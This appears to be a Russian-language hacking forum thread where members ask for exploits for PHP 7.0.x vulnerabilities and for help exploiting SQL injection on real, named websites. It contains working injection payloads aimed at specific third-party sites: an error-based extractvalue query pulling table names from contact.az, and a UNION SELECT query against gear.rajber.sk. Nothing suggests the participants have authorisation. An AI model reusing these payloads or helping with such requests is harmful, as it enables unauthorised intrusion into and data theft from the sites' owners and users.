Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
  2. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
  3. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    Ребят срочно нужна помощь от людей которые знают толк в серверах
    [​IMG]
    Кто знает эксплоиты на те уязвимости которые на скрине ?
    Срочно нужна любая инфа
     
  4. pw0ned

    pw0ned Member

    Joined:
    8 Jan 2016
    Messages:
    118
    Likes Received:
    48
    Reputations:
    14
    Почему не можешь загуглить ? Если с тобой и поделятся, так паблик сплойтом, который ты и сам можешь найти введя запрос в гугл.
     
  5. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    Правда искал, выводит тупо инфа которая в нексусе есть
    Можешь тот же паблик кинуть ? или название в Metasploit
     
  6. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    Так что не поможешь ?)
     
  7. pw0ned

    pw0ned Member

    Joined:
    8 Jan 2016
    Messages:
    118
    Likes Received:
    48
    Reputations:
    14
    Не обязательно ищи в гугле, пробуй такие поисковики как Bing,duckduckgo, там тоже часто выводит инфу о сплойтах.
     
  8. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    Да ща проблема меня не один браузер теперь не пускает на localhost:8834/ (Nessus) раньше хоть гугл разрешал пройти хоть и ругался а щас и он не разрешает
    [​IMG]
     
  9. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    Ребят нужны эксплоиты на эти дыры
    PHP 7.0.x < 7.0.11 Multiple Vulnerabilities
    PHP 7.0.x < 7.0.5 Multiple Vulnerabilities
    PHP 7.0.x < 7.0.8 Multiple Vulnerabilities
    PHP 7.0.x < 7.0.9 Multiple Vulnerabilities (httpoxy)
    PHP 7.0.x < 7.0.7 Multiple Vulnerabilities => (CVE-2016-5093)



     
  10. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Хз куда делся мой пост.


    PHP:
    http://www.contact.az/cntr.php?indx=1+ and extractvalue(0x0a,/*!12345concat*/(0x0a,(select /*!12345table_name*/ from /*!12345information_schema.tables*/ where table_schema=database()  limit 0,1)))
     
  11. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    Ребят программа тут видит SQL injection Oracle, мамп не видит, может кто поможет раскрутить хотя бя до версии или запрос на мамп поставить нормальный что бы тот читал уязвимость
    https://kaspi.kz/shop/p/doctor-plusheva-chemodanchik-doktora-10500292/
     
  12. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    ГДЕ?
    ПОСТ ЗАПРОС?
     
  13. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    Да хер знат мож когда переадресация, мамп там чёт увидел но не раскрутил
     
  14. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    Чем сканил?
     
  15. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    Дампером парсил
     
  16. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    Мамп ошибается
     
  17. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
  18. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
  19. Bobrenz

    Bobrenz New Member

    Joined:
    29 Jul 2015
    Messages:
    25
    Likes Received:
    2
    Reputations:
    0
    Добрый день, можно вопрос по раскрутке уязвимости руками
    http://gear.rajber.sk/index.php?starting=7' пытаюсь руками через юнион определить кол-во столбцов, но не получается, что я не так мб делаю или данная уязвимость не раскручивается? постоянно одна и та же ошибка "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1 --, 7' at line 1"
     
  20. pw0ned

    pw0ned Member

    Joined:
    8 Jan 2016
    Messages:
    118
    Likes Received:
    48
    Reputations:
    14
    http://gear.rajber.sk/index.php?starting=7+union+select+1,2,3,4,5,6,7,8+


    Снизу вроде вывод.